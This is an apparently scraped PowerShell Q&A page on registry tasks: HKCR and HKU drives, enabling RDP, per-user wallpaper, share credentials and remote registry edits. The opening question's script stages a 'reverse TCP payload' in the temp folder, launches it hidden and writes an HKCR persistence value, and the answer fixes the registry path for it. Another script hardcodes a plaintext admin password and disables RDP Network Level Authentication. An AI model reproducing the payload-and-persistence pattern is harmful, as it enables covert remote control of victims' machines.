Creating HKCR registry key using powershell script - windows

$PERprogram = $env:tmp+"\rev_tcp.exe" # Downloading the reverse TCP payload to the temp folder
$dest = $env:tmp+"\rev_tcp"
$cmd = "powershell -WindowStyle Hidden " + $PERprogram
DownloadPayload 'rev_tcp' $dest -ErrorAction Continue;
Set-ItemProperty "HKCR:\.cpl\persistentHandler" -Name "sd" -Value -Force
When I try to run the above script, I get the error "A drive with name HKCR does not exist", but I already created the HKCR drive in PowerShell with New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR.

You can use HKLM:\SOFTWARE\Classes instead of creating HKCR:.

Related

Registry value not change

So I just started learning about PowerShell scripting.
My objective is to uncheck this one:
system properties
So I created a PowerShell script to run the file.reg.
This is my test1.ps1:
$username = "desktop-2ussd\viola"
$password = "qwerty"
$AdminCred = New-Object System.Management.Automation.PSCredential -ArgumentList @($username,
(ConvertTo-SecureString -String $password -AsPlainText -Force))
$regFile = ".\file.reg"
$regArg1 = "import $regFile"
Start-Process reg.exe -ArgumentList $regArg1 -Credential $AdminCred
And this is my file.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"updateRDStatus"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000
After that I run the script like this:
powershell -ExecutionPolicy Bypass -File .\test1.ps1
There is no error output, but the checkbox is still checked.
Please help me.
Currently you won't recognize if something goes wrong, as you do not get a return code. In the case of Start-Process you would need to specify the parameters:
-wait
-passthru
to get the return code.
But you can write to the registry directly from PowerShell instead of using reg.exe, e.g.:
set-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -name fDenyTSConnections -value 0
The above-mentioned registry change takes effect immediately, without restarting the related service.
Based on your comment, you forgot to specify the computer where the command should run. Also make use of $using to access variables of the calling machine from the remote machine, e.g.:
$code = {
$newValue = $using:value
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value $newValue
}
$value = 0
invoke-command -computername [TargetComputerName] -credential $cred -scriptblock $code
In your example you passed the value to the parameter -Value as $args[0]; this only works if you specify the parameter -ArgumentList of the Invoke-Command cmdlet. But I would advise using $using as outlined in my example.
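The -Wait / -PassThru advice above, combined with a read-back of the values, as an added example that is not part of the original answer. Import-RegFileChecked is a hypothetical helper name, and the code assumes an elevated session with file.reg in the current directory.

```powershell
# Added example, not from the original answer. Assumes an elevated session.
# Import-RegFileChecked is a hypothetical helper name.
function Import-RegFileChecked {
    param(
        [Parameter(Mandatory = $true)][string]$RegFile,
        # Expected state after the import: key path -> @{ valueName = data }
        [Parameter(Mandatory = $true)][hashtable]$Expected
    )

    $full = (Resolve-Path -LiteralPath $RegFile).Path
    # -Wait blocks until reg.exe exits; -PassThru returns the process object
    # that carries the exit code.
    $proc = Start-Process -FilePath reg.exe -ArgumentList "import `"$full`"" -Wait -PassThru -WindowStyle Hidden
    if ($proc.ExitCode -ne 0) {
        throw "reg.exe import failed with exit code $($proc.ExitCode)"
    }

    # Read each value back rather than trusting the exit code alone.
    foreach ($key in $Expected.Keys) {
        $actual = Get-ItemProperty -LiteralPath $key -ErrorAction Stop
        foreach ($name in $Expected[$key].Keys) {
            [pscustomobject]@{
                Key      = $key
                Name     = $name
                Expected = $Expected[$key][$name]
                Actual   = $actual.$name
                Match    = ($actual.$name -eq $Expected[$key][$name])
            }
        }
    }
}

# Values taken from the file.reg in the question.
# UserAuthentication = 0 turns Network Level Authentication off; 1 requires it.
$ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$expected = @{}
$expected[$ts] = @{ fDenyTSConnections = 0; updateRDStatus = 1 }
$expected["$ts\WinStations\RDP-Tcp"] = @{ UserAuthentication = 0 }

Import-RegFileChecked -RegFile .\file.reg -Expected $expected | Format-Table -AutoSize
```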

Test-Path returning false even though it exists

The PowerShell command returns False even though that path exists in the registry. What am I doing wrong?
PS D:\Folder> Test-Path -Path 'HKU:\S-9-9-21-57989841-616249376-1801674531-2451702'
False
Drive HKU: is not defined by default.
Either use:
Test-Path -Path 'Registry::HKEY_USERS\S-9-9-21-57989841-616249376-1801674531-2451702'
or define the drive first:
$null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
Test-Path -Path 'HKU:\S-9-9-21-57989841-616249376-1801674531-2451702'
and when finished remove that drive with Remove-PSDrive -Name HKU
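Both this question and the HKCR question at the top of the page come down to a registry PSDrive not being available in the session that runs the command. As an added example (not from any of the posts), the hypothetical helper Convert-ToProviderPath rewrites drive-style paths into provider-qualified ones that need no PSDrive; the sample paths are constructed and the checks are read-only.

```powershell
# Added example. Convert-ToProviderPath is a hypothetical helper, not a built-in cmdlet.
# Only HKLM: and HKCU: are mounted by default; every other hive needs either
# New-PSDrive in the same session or a provider-qualified path.
# HKEY_CLASSES_ROOT is a merged view of HKLM\SOFTWARE\Classes and HKCU\Software\Classes.
$HiveByDrive = @{
    HKLM = 'HKEY_LOCAL_MACHINE'
    HKCU = 'HKEY_CURRENT_USER'
    HKCR = 'HKEY_CLASSES_ROOT'
    HKU  = 'HKEY_USERS'
    HKCC = 'HKEY_CURRENT_CONFIG'
}

function Convert-ToProviderPath {
    param([Parameter(Mandatory = $true)][string]$Path)

    # Already provider-qualified: nothing to do.
    if ($Path -match '^Registry::') { return $Path }

    if ($Path -match '^(?<drive>[A-Za-z]+):\\?(?<rest>.*)$') {
        $drive = $Matches['drive']
        $rest  = $Matches['rest'].TrimEnd('\')
        $hive  = $HiveByDrive[$drive]
        if (-not $hive) { throw "Unknown registry drive '$drive'" }
        if ($rest) { return "Registry::$hive\$rest" }
        return "Registry::$hive"
    }
    throw "Not a drive-style registry path: $Path"
}

# Constructed sample paths; nothing is written to the registry.
$samples = 'HKCR:\.txt', 'HKU:\.DEFAULT\Control Panel\Desktop', 'HKLM:\SOFTWARE\Classes\.txt'
foreach ($p in $samples) {
    $driveName = ($p -split ':')[0]
    $resolved  = Convert-ToProviderPath -Path $p
    [pscustomobject]@{
        Input        = $p
        ProviderPath = $resolved
        DriveMounted = [bool](Get-PSDrive -Name $driveName -ErrorAction SilentlyContinue)
        Exists       = Test-Path -LiteralPath $resolved
    }
}
```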

Windows 10 Set default wallpaper for anyone who logs in?

Is there a way to set the default wallpaper for a new user logging into Windows 10? I was supplied with the script below, but it only works for the current user. Is it possible to set it for any user that logs in?
Function Set-WallPaper($Value)
{
    Set-ItemProperty -path 'HKCU:\Control Panel\Desktop\' -name wallpaper -value $value
    rundll32.exe user32.dll, UpdatePerUserSystemParameters
}
For some reason that registry entry doesn't work with new profiles in Windows 10. Some other setup process clobbers it. I've seen scripts where the default .jpg is made writeable and then replaced. http://ccmexec.com/2015/08/replacing-default-wallpaper-in-windows-10-using-scriptmdtsccm/
You can access all loaded user registry hives through the HKEY_USERS hive.
It's not automatically mounted like HKCU: or HKLM:, but you can access it with a provider-qualified path, like this:
Get-ChildItem -Path Registry::HKEY_USERS
I'd also suggest that you declare your parameters properly as well:
function Set-WallPaper
{
    param(
        [Parameter(Mandatory=$true)]
        [System.IO.FileInfo]$WallPaperFile,
        [Parameter(Mandatory=$false)]
        [switch]$All
    )
    if($All){
        foreach($UserHive in Get-ChildItem Registry::HKEY_USERS){
            $DesktopKeyPath = (Join-Path $UserHive.PSPath "Control Panel\Desktop")
            if(Test-Path $DesktopKeyPath){
                Set-ItemProperty -Path $DesktopKeyPath -Name Wallpaper -Value $WallPaperFile.FullName
            }
        }
    } else {
        Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name wallpaper -Value $WallPaperFile.FullName
    }
    rundll32.exe user32.dll, UpdatePerUserSystemParameters
}

Powershell PS Credentials

I'm getting confused while trying to automatically login to a share on my server through Powershell using PSCredentials.
Here is the code I'm currently using WITHOUT using PSCredentials...
#Login to server to copy installer files to desktop
Remove-PSDrive P
New-PSDrive -Name P -PSProvider FileSystem -Root \\192.168.1.85\Users2\Ross\Documents\Powershell -Credential Ross
#Copies installer files from server to the local desktop
Copy-Item -Path \\192.168.1.85\Users2\Ross\Documents\Powershell\ccsetup502.exe -Destination C:\Users\Ross\Desktop
#Executes copied installers
Start-Process C:\Users\Ross\Desktop\ccsetup502.exe -ArgumentList "/S" -Wait -Verb RunAs
#Deletes leftover installer files
Remove-Item C:\Users\Ross\Desktop\ccsetup502.exe
And here is the website I'm using to help, but whichever way I try and apply it to my own script, it never works?
http://geekswithblogs.net/Lance/archive/2007/02/16/106518.aspx
Thanks in advance!
Ross
Try this. It will prompt you for creds, but you could always create them and store them in a variable if you wish as well.
#Login to server to copy installer files to desktop
Remove-PSDrive P
New-PSDrive -Name P -PSProvider FileSystem -Root \\192.168.1.85\Users2\Ross\Documents\Powershell -Credential (Get-Credential)
#Copies installer files from server to the local desktop
Copy-Item -Path \\192.168.1.85\Users2\Ross\Documents\Powershell\ccsetup502.exe -Destination C:\Users\Ross\Desktop
#Executes copied installers
Start-Process C:\Users\Ross\Desktop\ccsetup502.exe -ArgumentList "/S" -Wait -Verb RunAs
#Deletes leftover installer files
Remove-Item C:\Users\Ross\Desktop\ccsetup502.exe
After some perseverance I managed to solve this...
Probably worth noting that I left the PSDrive removal in there for testing purposes, as you'll get an error if the script doesn't complete and you try to run it again after making changes.
#Ensure previous PSDrive 'p' is removed
Remove-PSDrive P
#Creates new PSDrive
New-PSDrive -Name P -PSProvider FileSystem -Root \\YOURSERVERNAMEHERE\YOURFILEPATHHERE
#Login to server
new-object -typename System.Management.Automation.PSCredential -argumentlist "YOURDOMAINORSERVERUSERNAMEHERE",$password
#Copies installer files from server to the local desktop
Copy-Item -Path \\YOURSERVERNAMEHERE\YOURFILEPATHHERE\ccsetup502.exe -Destination C:\YOURFILEPATHHERE
#Executes copied installers, runs the installer silently, waits until the installer has completed
Start-Process C:\YOURFILEPATHHERE\ccsetup502.exe -ArgumentList "/S" -Wait -Verb RunAs
#Deletes leftover installer files
Remove-Item C:\YOURFILEPATHHERE\ccsetup502.exe
Hopefully this helps someone else who is stuck in the future!
Thank you anyone else who contributed their efforts.
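For the share login discussed in this thread, and the plaintext password in test1.ps1 further up the page, an added example (not code from any of the posts) that keeps the credential out of the script and passes it to the cmdlet that actually connects. It goes one step beyond the thread by checking the installer's Authenticode signature before running it elevated; $CredFile, $Share and the use of the temp folder are assumptions.

```powershell
# Added example. $CredFile, $Share and $Installer are placeholders (assumptions).
$CredFile  = Join-Path $env:LOCALAPPDATA 'share-cred.xml'
$Share     = '\\YOURSERVERNAMEHERE\YOURFILEPATHHERE'
$Installer = 'ccsetup502.exe'

# First run prompts once. On Windows, Export-Clixml stores the password
# DPAPI-encrypted, readable only by the same user on the same machine.
if (-not (Test-Path -LiteralPath $CredFile)) {
    Get-Credential -Message "Account for $Share" | Export-Clixml -LiteralPath $CredFile
}
$cred = Import-Clixml -LiteralPath $CredFile

$target = Join-Path $env:TEMP $Installer
try {
    # A PSCredential has no effect until it is passed to the cmdlet that connects.
    $null = New-PSDrive -Name P -PSProvider FileSystem -Root $Share -Credential $cred -ErrorAction Stop
    Copy-Item -LiteralPath "P:\$Installer" -Destination $target -ErrorAction Stop

    # Do not run an elevated installer whose Authenticode signature is not valid.
    $sig = Get-AuthenticodeSignature -FilePath $target
    if ($sig.Status -ne 'Valid') {
        throw "Signature check failed for $target ($($sig.Status))"
    }
    Start-Process -FilePath $target -ArgumentList '/S' -Wait -Verb RunAs
}
finally {
    # Clean up even when a step above failed, so a rerun starts from a known state.
    Remove-Item -LiteralPath $target -ErrorAction SilentlyContinue
    if (Get-PSDrive -Name P -ErrorAction SilentlyContinue) { Remove-PSDrive -Name P }
}
```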

Editing registry keys remotely with Powershell

Is it possible to edit a registry key remotely with a Powershell script? If it is, how?
I have a list of 7 servers on which I have to disable Windows Update settings. I've coded the following script, but it can only be used locally:
$regkey = "HKLM:\SOFTWARE\microsoft\......\auto update"
set-itemproperty -path $regkey -name AUOptions -value 1
set-itemproperty -path $regkey -name ElevateNonAdmins -value 0
set-itemproperty -path $regkey -name IncludeRecommendedUpdates -value 0
Any suggestion? Thanks!
PowerShell's support for remote registry is done via .NET. There are lots of Google answers available. Here's one right from this site:
$Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $computer1)
$RegKey= $Reg.OpenSubKey("SOFTWARE\Veritas\NetBackup\CurrentVersion")
How to set the values is left as an exercise to the reader.
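One way to carry the .NET approach above through to writing and verifying values, as an added example that is not from the original answer. Set-RemoteRegistryDword is a hypothetical helper name, the server names are constructed, and the subkey is a placeholder because the question elides it; the targets need the Remote Registry service running and the caller needs admin rights on them.

```powershell
# Added example. Set-RemoteRegistryDword is a hypothetical helper name.
function Set-RemoteRegistryDword {
    param(
        [Parameter(Mandatory = $true)][string[]]$ComputerName,
        # Path below HKEY_LOCAL_MACHINE, without an "HKLM:\" prefix
        [Parameter(Mandatory = $true)][string]$SubKey,
        # Value name -> DWORD data
        [Parameter(Mandatory = $true)][hashtable]$Values
    )
    foreach ($computer in $ComputerName) {
        $base = $null
        $key  = $null
        try {
            $base = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $computer)
            # The second argument opens the key writable; the default is read-only.
            $key = $base.OpenSubKey($SubKey, $true)
            if ($null -eq $key) { throw "Key not found: $SubKey" }

            foreach ($name in $Values.Keys) {
                $old = $key.GetValue($name)
                $key.SetValue($name, [int]$Values[$name], [Microsoft.Win32.RegistryValueKind]::DWord)
                # Report old and re-read new value so each change is auditable.
                [pscustomobject]@{
                    Computer = $computer; Name = $name
                    Old = $old; New = $key.GetValue($name)
                }
            }
        }
        catch {
            # One unreachable server should not stop the remaining ones.
            [pscustomobject]@{
                Computer = $computer; Name = $null
                Old = $null; New = "ERROR: $($_.Exception.Message)"
            }
        }
        finally {
            if ($key)  { $key.Close() }
            if ($base) { $base.Close() }
        }
    }
}

# Constructed server names; replace the placeholder subkey with the real one.
$servers = 'SERVER01', 'SERVER02'
$values  = @{ AUOptions = 1; ElevateNonAdmins = 0; IncludeRecommendedUpdates = 0 }
Set-RemoteRegistryDword -ComputerName $servers -SubKey '<SUBKEY-BELOW-HKLM>' -Values $values
```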
